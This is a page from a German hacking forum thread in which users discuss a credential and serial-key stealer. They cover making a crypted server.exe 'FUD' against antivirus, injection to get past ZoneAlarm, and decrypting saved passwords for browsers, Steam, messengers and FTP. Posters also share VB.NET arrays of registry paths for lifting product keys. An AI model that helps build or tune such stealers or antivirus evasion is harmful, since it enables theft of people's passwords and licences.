Seite 2 von 3 ErsteErste 123 LetzteLetzte
Ergebnis 11 bis 20 von 23
  1. #11
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Das sie fud ist ist normal. nach jedem neu compilen wird sie noch mehr undtecter...
    zu zonealaram:

    ohne injection: nein

  2. #12
    W32.Lovgate
    Registriert seit
    10.05.2009
    Beiträge
    363

    Standard

    hää wie jetzt?

    nach jedem neu compilen wird sie noch mehr undtecter...
    also immer wieder wenn ich eine server.exe erstelle? oder wenn ich immer wieder einen neuen crypter programmiere?

    Achja wie lautet der Pfad zu FireFox 1-3, IE, Steam, Windows Live Messenger , ICQ und FTP?

    danke im voraus
    DK007's Blackmarketprofil

    [5|0]

  3. #13
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Achja wie lautet der Pfad zu FireFox 1-3, IE, Steam, Windows Live Messenger , ICQ und FTP?
    Dafür musst du eine Decryption schreiben , man kann diese nicht einfach aus der Registry Lesen

    bezüglich FUD: warum soll eine Datei erkannt werden , an dessen ende ein paar Bytezeilen stehen ?

    also das es FUD ist ist eigentlich nur logisch

    MfG

  4. #14
    Bugbear Wurm Avatar von CyphaX
    Registriert seit
    26.07.2008
    Beiträge
    249

    Standard

    sei doch zufrieden, falls er echt fud ist, und falls die verbindung klappt und alles

  5. #15
    W32.Lovgate
    Registriert seit
    10.05.2009
    Beiträge
    363

    Standard

    Aso ok.
    Danke.
    Ich will gerne noch ein serial rauskriegen. beispielsweise von Adobe Photoshop CS4.
    habs schon in die richtige form geschrieben:
    {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey"}
    Wie füge ich das jetzt nach dies jetzt nach: Dim Schlüssel As String() = {"TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0roductKey"} hinzu?

    so funktioniert es irgendwie nicht:
    Dim Schlüssel As String() = {"TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0roductKey"} & {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey"}
    so auch nicht
    Dim Schlüssel As String() = {"TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0roductKey"}
    Dim Schlüssel As String() = {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey"}
    DK007's Blackmarketprofil

    [5|0]

  6. #16
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Du musst die in ein einzelnes String packen. Dafür sind Arrays da. z. B.:

    Dim Schlüssel(2) As String
    Schlüssel(0) = {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey"}

    Schlüssel(1) = {"TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0roductKey"}
    etc...

    Ich persönlich würds aber bissel anders machen (nein nich jeden key einzeln^^)

  7. #17
    W32.Lovgate
    Registriert seit
    10.05.2009
    Beiträge
    363

    Standard

    @hackerking
    danke werd ich probieren.
    wie würdest du es denn machen?

    Edit
    habs mal probiert, aber bei mir kommt dann immer Error:

    Value of type '1-dimensional array of String' cannot be converted to 'String'.

    Hab nur das hingeschrieben
    Dim SchlüsselInformationen As String()
    Dim Schlüssel(2) As String
    Schlüssel(0) = {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey"}
    Schlüssel(1) = {"TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0roductKey"}
    Geändert von DK007 (13.06.2009 um 19:21 Uhr)
    DK007's Blackmarketprofil

    [5|0]

  8. #18
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Da sieht man einfach mal das Hackerking von Arrays keine ahnung hat
    Wie will man den bitte einem Array (das noch keine feste Größe hat) per index einträge hinzufügen ?
    Das würde in diesem Fall nur funktionieren , wenn man das array gleich mit einer festen größe intilitalisiert.

    @ DK007
    Also du musst es so machen , da du ja eine direkte Zuweisung vornehmen willst^^

    Code:
            Dim Schlüssel As String() = _
            {"Photoshop CS4:HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\Ashampoo Burning Studio 2009:RegKey" _
             , "TuneUp 2009:HKEY_LOCAL_MACHINE\SOFTWARE\TuneUp\Utilities\ 8.0:ProductKey"}
    Die unterstriche am Ende dienen dafür um es auf die nächste Zeile verteilen zu können , sieht meiner Meinung nach besser aus , vorallem wenn man mehrere keys benutzt , kann sonst ziemlich unübersichtlich werden

    Du musst nur darauf achten das du zwischen jedem neuen key ein Komma setzt.

    MfG
    Geändert von Sawyer (14.06.2009 um 09:18 Uhr)

  9. #19
    W32.Lovgate
    Registriert seit
    10.05.2009
    Beiträge
    363

    Standard

    ok danke ThePapst.
    Warst mir eine große hilfe.
    Habe auch das hier gelesen.
    http://free-hack.com/showthread.php?...ght=decryption und wollte fragen ob die jetzt etwas mehr weißt?
    könntest du dann eventuell auch ein v-tut dafür machen?
    danke im voraus
    DK007's Blackmarketprofil

    [5|0]

  10. #20
    CIH-Virus Avatar von krusty
    Registriert seit
    12.10.2008
    Beiträge
    445

    Standard

    soweit ich weiß ist in dem code alles richtig, musst dann halt lokal auf deinem rechner decrypten

Seite 2 von 3 ErsteErste 123 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •